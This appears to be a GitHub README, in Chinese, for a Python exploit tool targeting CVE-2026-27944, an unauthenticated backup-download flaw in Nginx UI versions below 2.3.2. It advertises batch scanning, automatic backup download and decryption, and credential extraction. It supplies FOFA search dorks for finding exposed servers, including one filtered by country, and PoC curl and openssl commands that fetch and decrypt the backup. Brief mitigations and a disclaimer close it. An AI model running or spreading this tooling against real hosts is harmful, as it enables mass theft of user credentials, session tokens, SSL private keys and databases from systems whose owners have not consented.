BimaBalance/Cve-2026-27944-Tools-Exploit
GitHub: BimaBalance/Cve-2026-27944-Tools-Exploit
针对 Nginx UI 未授权备份漏洞(CVE-2026-27944)的 Python 漏洞利用工具,支持批量扫描、自动下载解密备份并提取凭据。
Stars: 1 | Forks: 0
🚀 CVE-2026-27944:Nginx UI 未授权备份漏洞利用
📌 描述
27944.py 是一个针对 CVE-2026-27944 的漏洞利用工具,允许攻击者在无需身份验证的情况下下载并解密 Nginx UI 的备份。
此漏洞存在于 < 2.3.2 版本的 Nginx UI 中,允许访问:
· 用户凭据和 session token
· SSL 私钥
· Nginx 配置
· 数据库文件
🔧 功能
· ✅ 从文件中进行批量扫描
· ✅ 单目标漏洞利用
· ✅ 自动下载备份
· ✅ 自动解密 AES-256-CBC
· ✅ 从备份中自动提取凭据
🛠️ 安装方法
```
git clone https://github.com/bimabalance/CVE-2026-27944.git
cd CVE-2026-27944
pip install -r requirements.txt
```
🚀 使用方法
1. 批量扫描
```
python 27944.py -f targets.txt -o hasil_scan
```
2. 单目标漏洞利用
```
python 27944.py -t target.com:9000 --exploit --decrypt
```
3. 完整漏洞利用
```
python 27944.py -f targets.txt --exploit --decrypt -o hasil_full
```
📋 目标格式
```
target1.com:9000
192.168.1.1:9000
target2.com:8080
```
🎯 FOFA Dork
```
title="Nginx UI"
icon_hash="-1565173320"
header="X-Backup-Security"
body="Nginx UI" && port="9000"
title="Nginx UI" && country="ID"
```
📂 输出结果
```
results/
├── results.json
├── target_backup.bin
├── target_backup_decrypted.zip
└── target_extracted/
├── app.ini
├── database.db
├── nginx.conf
└── ssl/
```
⚠️ 免责声明
本工具出于教育和道德安全测试目的而开发。作者不对本工具的滥用承担责任。请仅在您拥有或获得书面授权进行测试的系统上使用。
📝 技术说明
CVE-2026-27944 是 Nginx UI 中的一个严重漏洞,允许攻击者无需身份验证即可访问 /api/backup endpoint。备份包含使用 AES-256 加密的敏感数据,但 key 和 IV 通过 X-Backup-Security header 以 Base64 格式发送。
CVSS Score: 9.8 (Critical)
受影响版本: Nginx UI < 2.3.2
缓解措施:
1. 升级至 Nginx UI v2.3.3
2. 禁止访问 /api/backup
3. 轮换所有凭据
💀 POC
```
# 检查 vulnerability
curl -I http://target:9000/api/backup
# 下载 backup
curl -s http://target:9000/api/backup -o backup.bin
# 解密 backup(手动)
openssl enc -d -aes-256-cbc -base64 -K -iv -in backup.bin -out backup_decrypted.zip
```
标签:CVE-2026-27944, Python, StruQ, 安全测试工具, 无后门, 逆向工具